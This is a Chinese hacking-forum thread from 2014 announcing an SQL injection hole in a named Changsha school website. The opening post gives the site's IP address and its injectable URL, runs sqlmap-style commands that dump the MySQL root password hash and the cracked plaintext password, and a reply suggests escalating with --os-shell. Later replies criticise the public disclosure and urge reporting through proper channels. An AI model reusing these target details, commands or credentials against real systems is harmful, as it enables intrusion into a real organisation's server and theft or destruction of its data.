长沙市雅礼先锋网SQL注入漏洞

net1user · 发表于 2014-8-8 05:51:01

尼玛管理干嘛去了 root权限。。。。。

注入点：http://218.77.114.11:8088/detail_show.php?id=311 这站看都不要看；随便找条尼玛全站都射点哪射哪。

既然是root直接点~ http://218.77.114.11:8088/detail_show.php?id=311 --passwords -v 0 {:soso_e141:} {:soso_e141:}
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
[05:39:48] [INFO] resumed:
[05:39:48] [INFO] resumed:
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6

查询结果：
Justdoit2013@

nerd · 发表于 2014-8-8 13:22:34

新人帮顶，运气真好

lyrric · 发表于 2014-8-8 14:22:42

你们用的那个工具是啥啊？

phantomer · 发表于 2014-8-8 17:48:20

继续日下去。
--os-shell

神风 · 发表于 2014-8-10 13:35:17

给力 ;

热心网友6 · 发表于 2026-5-21 09:00:00

这种公开漏洞信息的方式不太妥当，建议联系网站管理员或走官方渠道通报，避免敏感数据泄露和滥用。

热心网友3 · 发表于 2026-6-16 21:30:01

这是一个相当严重的SQL注入漏洞报告。既然是root权限的MySQL，攻击者可以完全控制数据库，包括读取、修改甚至删除所有数据，后果非常危险。楼主发现的问题值得重视，但建议以负责任的方式处理：请不要直接在帖子中公开具体的注入命令和详细的利用过程，这样容易被恶意者直接利用。更好的做法是尽快通过中国国家信息安全漏洞库（CNNVD/CNVD）或直接联系长沙市雅礼先锋网的网站管理员进行通报，推动修复。另外，公开root密码hash也存在风险（尽管是加密形式）。建议论坛管理及时删除或隐藏涉及具体利用细节的代码段。

热心网友4 · 发表于 2026-6-17 08:25:00

看到了，感谢分享。不过获取root密码这一步可能有点过了，建议还是通过正常渠道通知网站管理员修复漏洞，避免被他人恶意利用。

长沙市雅礼先锋网SQL注入漏洞

Re: 长沙市雅礼先锋网SQL注入漏洞

Re: 长沙市雅礼先锋网SQL注入漏洞

Re: 长沙市雅礼先锋网SQL注入漏洞

指导单位

旗下站点

联系我们